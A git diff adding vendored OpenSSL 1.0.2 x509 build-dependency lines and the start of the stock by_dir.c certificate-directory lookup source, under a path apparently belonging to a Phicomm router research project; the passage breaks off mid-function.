+by_dir.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+by_dir.o: ../cryptlib.h by_dir.c
+by_file.o: ../../e_os.h ../../include/openssl/asn1.h
+by_file.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+by_file.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+by_file.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+by_file.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+by_file.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+by_file.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+by_file.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+by_file.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+by_file.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+by_file.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+by_file.o: ../../include/openssl/x509_vfy.h ../cryptlib.h by_file.c
+x509_att.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_att.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_att.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_att.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_att.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_att.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_att.o: ../../include/openssl/opensslconf.h
+x509_att.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_att.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_att.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_att.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_att.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_att.o: ../cryptlib.h x509_att.c
+x509_cmp.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_cmp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_cmp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_cmp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_cmp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_cmp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_cmp.o: ../../include/openssl/opensslconf.h
+x509_cmp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_cmp.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_cmp.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_cmp.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_cmp.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_cmp.o: ../cryptlib.h x509_cmp.c
+x509_d2.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_d2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_d2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_d2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_d2.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_d2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_d2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_d2.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_d2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_d2.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_d2.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_d2.c
+x509_def.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_def.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_def.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_def.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_def.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_def.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_def.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_def.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_def.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_def.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_def.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_def.c
+x509_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x509_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x509_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_err.o: ../../include/openssl/opensslconf.h
+x509_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_err.o: ../../include/openssl/x509_vfy.h x509_err.c
+x509_ext.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_ext.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_ext.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_ext.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_ext.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_ext.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_ext.o: ../../include/openssl/opensslconf.h
+x509_ext.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_ext.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_ext.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_ext.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_ext.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_ext.o: ../cryptlib.h x509_ext.c
+x509_lu.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_lu.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_lu.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_lu.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_lu.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_lu.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_lu.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x509_lu.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x509_lu.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x509_lu.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x509_lu.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x509_lu.o: ../../include/openssl/x509v3.h ../cryptlib.h x509_lu.c
+x509_obj.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_obj.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_obj.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_obj.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_obj.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_obj.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_obj.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_obj.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_obj.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_obj.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_obj.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_obj.c
+x509_r2x.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_r2x.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+x509_r2x.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x509_r2x.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_r2x.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_r2x.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_r2x.o: ../../include/openssl/opensslconf.h
+x509_r2x.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_r2x.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_r2x.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_r2x.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_r2x.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_r2x.c
+x509_req.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_req.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x509_req.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x509_req.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_req.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_req.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_req.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_req.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_req.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+x509_req.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_req.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_req.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_req.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_req.c
+x509_set.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_set.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_set.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_set.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_set.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_set.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_set.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_set.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_set.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_set.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_set.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_set.c
+x509_trs.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_trs.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_trs.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_trs.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_trs.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_trs.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_trs.o: ../../include/openssl/opensslconf.h
+x509_trs.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_trs.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_trs.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_trs.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_trs.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_trs.o: ../cryptlib.h x509_trs.c
+x509_txt.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_txt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_txt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_txt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_txt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_txt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_txt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_txt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_txt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_txt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_txt.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_txt.c
+x509_v3.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_v3.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_v3.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_v3.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_v3.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_v3.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_v3.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x509_v3.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x509_v3.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x509_v3.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x509_v3.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x509_v3.o: ../../include/openssl/x509v3.h ../cryptlib.h x509_v3.c
+x509_vfy.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_vfy.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_vfy.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_vfy.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_vfy.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_vfy.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_vfy.o: ../../include/openssl/opensslconf.h
+x509_vfy.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_vfy.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_vfy.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_vfy.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_vfy.o: ../cryptlib.h vpm_int.h x509_vfy.c
+x509_vpm.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_vpm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_vpm.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_vpm.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_vpm.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_vpm.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_vpm.o: ../../include/openssl/opensslconf.h
+x509_vpm.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_vpm.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_vpm.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_vpm.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_vpm.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_vpm.o: ../cryptlib.h vpm_int.h x509_vpm.c
+x509cset.o: ../../e_os.h ../../include/openssl/asn1.h
+x509cset.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509cset.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509cset.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509cset.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509cset.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509cset.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509cset.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509cset.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509cset.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509cset.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509cset.c
+x509name.o: ../../e_os.h ../../include/openssl/asn1.h
+x509name.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509name.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509name.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509name.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509name.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509name.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509name.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509name.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509name.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509name.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509name.c
+x509rset.o: ../../e_os.h ../../include/openssl/asn1.h
+x509rset.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509rset.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509rset.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509rset.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509rset.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509rset.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509rset.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509rset.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509rset.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509rset.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509rset.c
+x509spki.o: ../../e_os.h ../../include/openssl/asn1.h
+x509spki.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509spki.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509spki.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509spki.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509spki.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509spki.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509spki.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509spki.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509spki.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509spki.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509spki.c
+x509type.o: ../../e_os.h ../../include/openssl/asn1.h
+x509type.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509type.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509type.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509type.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509type.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509type.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509type.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509type.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509type.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509type.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509type.c
+x_all.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x_all.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_all.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+x_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_all.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+x_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+x_all.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_all.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_all.o: ../../include/openssl/x509v3.h ../cryptlib.h x_all.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_dir.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_dir.c
new file mode 100644
index 0000000..9ee8f8d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/by_dir.c
@@ -0,0 +1,436 @@
+/* crypto/x509/by_dir.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include <errno.h>
+
+#include "cryptlib.h"
+
+#ifndef NO_SYS_TYPES_H
+# include <sys/types.h>
+#endif
+#ifndef OPENSSL_NO_POSIX_IO
+# include <sys/stat.h>
+#endif
+
+#include <openssl/lhash.h>
+#include <openssl/x509.h>
+
+typedef struct lookup_dir_hashes_st {
+    unsigned long hash;
+    int suffix;
+} BY_DIR_HASH;
+
+typedef struct lookup_dir_entry_st {
+    char *dir;
+    int dir_type;
+    STACK_OF(BY_DIR_HASH) *hashes;
+} BY_DIR_ENTRY;
+
+typedef struct lookup_dir_st {
+    BUF_MEM *buffer;
+    STACK_OF(BY_DIR_ENTRY) *dirs;
+} BY_DIR;
+
+DECLARE_STACK_OF(BY_DIR_HASH)
+DECLARE_STACK_OF(BY_DIR_ENTRY)
+
+static int dir_ctrl(X509_LOOKUP *ctx, int cmd, const char *argp, long argl,
+                    char **ret);
+static int new_dir(X509_LOOKUP *lu);
+static void free_dir(X509_LOOKUP *lu);
+static int add_cert_dir(BY_DIR *ctx, const char *dir, int type);
+static int get_cert_by_subject(X509_LOOKUP *xl, int type, X509_NAME *name,
+                               X509_OBJECT *ret);
+X509_LOOKUP_METHOD x509_dir_lookup = {
+    "Load certs from files in a directory",
+    new_dir,                    /* new */
+    free_dir,                   /* free */
+    NULL,                       /* init */
+    NULL,                       /* shutdown */
+    dir_ctrl,                   /* ctrl */
+    get_cert_by_subject,        /* get_by_subject */
+    NULL,                       /* get_by_issuer_serial */
+    NULL,                       /* get_by_fingerprint */
+    NULL,                       /* get_by_alias */
+};
+
+X509_LOOKUP_METHOD *X509_LOOKUP_hash_dir(void)
+{
+    return (&x509_dir_lookup);
+}
+
+static int dir_ctrl(X509_LOOKUP *ctx, int cmd, const char *argp, long argl,
+                    char **retp)
+{
+    int ret = 0;
+    BY_DIR *ld;
+    char *dir = NULL;
+
+    ld = (BY_DIR *)ctx->method_data;
+
+    switch (cmd) {
+    case X509_L_ADD_DIR:
+        if (argl == X509_FILETYPE_DEFAULT) {
+            dir = (char *)getenv(X509_get_default_cert_dir_env());
+            if (dir)
+                ret = add_cert_dir(ld, dir, X509_FILETYPE_PEM);
+            else
+                ret = add_cert_dir(ld, X509_get_default_cert_dir(),
+                                   X509_FILETYPE_PEM);
+            if (!ret) {
+                X509err(X509_F_DIR_CTRL, X509_R_LOADING_CERT_DIR);
+            }
+        } else
+            ret = add_cert_dir(ld, argp, (int)argl);
+        break;
+    }
+    return (ret);
+}
+
+static int new_dir(X509_LOOKUP *lu)
+{
+    BY_DIR *a;
+
+    if ((a = (BY_DIR *)OPENSSL_malloc(sizeof(BY_DIR))) == NULL)
+        return (0);
+    if ((a->buffer = BUF_MEM_new()) == NULL) {
+        OPENSSL_free(a);
+        return (0);
+    }
+    a->dirs = NULL;
+    lu->method_data = (char *)a;
+    return (1);
+}
+
+static void by_dir_hash_free(BY_DIR_HASH *hash)
+{
+    OPENSSL_free(hash);
+}
+
+static int by_dir_hash_cmp(const BY_DIR_HASH *const *a,
+                           const BY_DIR_HASH *const *b)
+{
+    if ((*a)->hash > (*b)->hash)
+        return 1;
+    if ((*a)->hash < (*b)->hash)
+        return -1;
+    return 0;
+}
+
+static void by_dir_entry_free(BY_DIR_ENTRY *ent)
+{
+    if (ent->dir)
+        OPENSSL_free(ent->dir);
+    if (ent->hashes)
+        sk_BY_DIR_HASH_pop_free(ent->hashes, by_dir_hash_free);
+    OPENSSL_free(ent);
+}
+
+static void free_dir(X509_LOOKUP *lu)
+{
+    BY_DIR *a;
+
+    a = (BY_DIR *)lu->method_data;
+    if (a->dirs != NULL)
+        sk_BY_DIR_ENTRY_pop_free(a->dirs, by_dir_entry_free);
+    if (a->buffer != NULL)
+        BUF_MEM_free(a->buffer);
+    OPENSSL_free(a);
+}
+
+static int add_cert_dir(BY_DIR *ctx, const char *dir, int type)
+{
+    int j, len;
+    const char *s, *ss, *p;
+
+    if (dir == NULL || !*dir) {
+        X509err(X509_F_ADD_CERT_DIR, X509_R_INVALID_DIRECTORY);
+        return 0;
+    }
+
+    s = dir;
+    p = s;
+    do {
+        if ((*p == LIST_SEPARATOR_CHAR) || (*p == '\0')) {
+            BY_DIR_ENTRY *ent;
+            ss = s;
+            s = p + 1;
+            len = (int)(p - ss);
+            if (len == 0)
+                continue;
+            for (j = 0; j < sk_BY_DIR_ENTRY_num(ctx->dirs); j++) {
+                ent = sk_BY_DIR_ENTRY_value(ctx->dirs, j);
+                if (strlen(ent->dir) == (size_t)len &&
+                    strncmp(ent->dir, ss, (unsigned int)len) == 0)
+                    break;
+            }
+            if (j < sk_BY_DIR_ENTRY_num(ctx->dirs))
+                continue;
+            if (ctx->dirs == NULL) {
+                ctx->dirs = sk_BY_DIR_ENTRY_new_null();
+                if (!ctx->dirs) {
+                    X509err(X509_F_ADD_CERT_DIR, ERR_R_MALLOC_FAILURE);
+                    return 0;
+                }
+            }
+            ent = OPENSSL_malloc(sizeof(BY_DIR_ENTRY));
+            if (!ent)
+                return 0;
+            ent->dir_type = type;
+            ent->hashes = sk_BY_DIR_HASH_new(by_dir_hash_cmp);
+            ent->dir = OPENSSL_malloc((unsigned int)len + 1);
+            if (!ent->dir || !ent->hashes) {
+                by_dir_entry_free(ent);
+                return 0;
+            }
+            strncpy(ent->dir, ss, (unsigned int)len);
+            ent->dir[len] = '\0';
+            if (!sk_BY_DIR_ENTRY_push(ctx->dirs, ent)) {
+                by_dir_entry_free(ent);
+                return 0;
+            }
+        }
+    } while (*p++ != '\0');
+    return 1;
+}
+
+static int get_cert_by_subject(X509_LOOKUP *xl, int type, X509_NAME *name,
+                               X509_OBJECT *ret)
+{
+    BY_DIR *ctx;
+    union {
+        struct {
+            X509 st_x509;
+            X509_CINF st_x509_cinf;
+        } x509;
+        struct {
+            X509_CRL st_crl;
+            X509_CRL_INFO st_crl_info;
+        } crl;
+    } data;
+    int ok = 0;
+    int i, j, k;
+    unsigned long h;
+    BUF_MEM *b = NULL;
+    X509_OBJECT stmp, *tmp;
+    const char *postfix = "";
+
+    if (name == NULL)
+        return (0);
+
+    stmp.type = type;
+    if (type == X509_LU_X509) {
+        data.x509.st_x509.cert_info = &data.x509.st_x509_cinf;
+        data.x509.st_x509_cinf.subject = name;
